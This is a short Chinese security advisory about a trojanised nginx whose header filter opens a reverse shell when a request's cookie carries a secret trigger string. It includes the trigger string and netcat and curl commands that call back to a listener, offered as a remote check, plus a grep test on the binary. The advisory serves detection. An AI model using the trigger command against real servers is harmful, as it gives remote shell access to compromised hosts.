【安全资讯】警惕新型nginx后门，目前全杀毒软件免杀

概述

 近日，我们捕获一个新型nginx后门，该后门免杀效果非常好，截至目前VT上所有杀毒软件都不能对其进行查杀。

    经过安恒威胁情报中心的研究员分析，发现黑客修改了原版nginx中处理http头的函数ngx_http_header_filter

黑客针对cookies字段进行了特殊处理，判断请求中是否包含“lkfakjf”，

如果包含，则会主动回连黑客给定的服务器地址。笔者分析逻辑后，构造了POC实现了反弹shell功能如下：

网络验证后门方法：

$ nc -lv 9999

$ curl "127.0.0.1" -H "Cookie:lkfakjfa0.0.0.0:9999"

如果在监听端口得到shell，说明服务器的nginx已经被黑客替换。

本地验证后门方法：

通过grep命令判断当前运行对nginx里面是否存在"/bin/sh"可疑字符串

$ which nginx |xargs grep "/bin/sh" -la